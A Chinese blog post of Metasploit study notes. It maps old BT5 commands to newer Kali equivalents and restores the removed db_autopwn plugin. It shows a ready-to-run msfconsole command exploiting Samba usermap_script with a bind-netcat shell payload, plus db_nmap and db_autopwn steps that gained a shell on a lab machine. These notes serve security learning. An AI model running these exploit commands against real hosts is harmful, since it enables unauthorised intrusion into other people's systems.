metasploit学习笔记2

1.阅读老资料的困惑

老资料里一般是根据BT5整理的,kali里的metasploit比较新,不太一样,这里整理一下。

a)msfcli被整合进msfconsole的参数里:

老指令:

#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E

新指令:

#msfconsole -x "use exploit/multi/samba/usermap_script; set RHOST 192.168.200.129; set PAYLOADcmd/unix/bind_netcat; [set LHOST IP;] run"

b)msfpayload、msfencode被整合到msfvenom里:

老指令:

msfpayload -l        #查看所有攻击载荷

msfencode -l         #查看所有编码器

新指令只需一条指令即可:

msfvenom -l payloads,encoders

下图是msfvenom的参数说明:

metasploit学习笔记2_第1张图片

c)db_autopwn自动渗透脚本被删除

据说是由于该脚本虽然使渗透傻瓜化,但是智能不高,并且造成的负载不小,容易被发现,所以删掉了。

目前替代的方法是可以使用metasploit的一些自动化插件和脚本,但是更好的方法还是自己选择合适的脚本和载荷,使负载变小,效率更高。

https://github.com/rapid7/metasploit-framework/tree/master/plugins

2.db_autopwn傻瓜化测试

虽然db_autopwn被删掉了,但是可以手工恢复。

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

源代码复制下来,保存为db_autopwn.rb文件,复制到/usr/share/metasploit-framwork/plugins/中,然后执行加载

#msf>load db_autopwn

渗透测试:

a)扫描测试机

#msf>db_nmap -v -A 192.168.200.129

--测试机的扫描结果会自动存放如Postgresql数据库中

b)查看扫描结果

metasploit学习笔记2_第2张图片

c)自动测试

#msf>db_autopwn -t -p -r -e          ----负载不小,1000多个脚本都会跑一遍,需要不少时间,好在成功了一个session。

metasploit学习笔记2_第3张图片

d)连接会话并测试

metasploit学习笔记2_第4张图片

会话连接已经成功,但user是www-data(敲错的指令,请自动忽略),不是root,没关系,至少证明db_autopwn还是管用的。

你可能感兴趣的:(metasploit学习笔记2)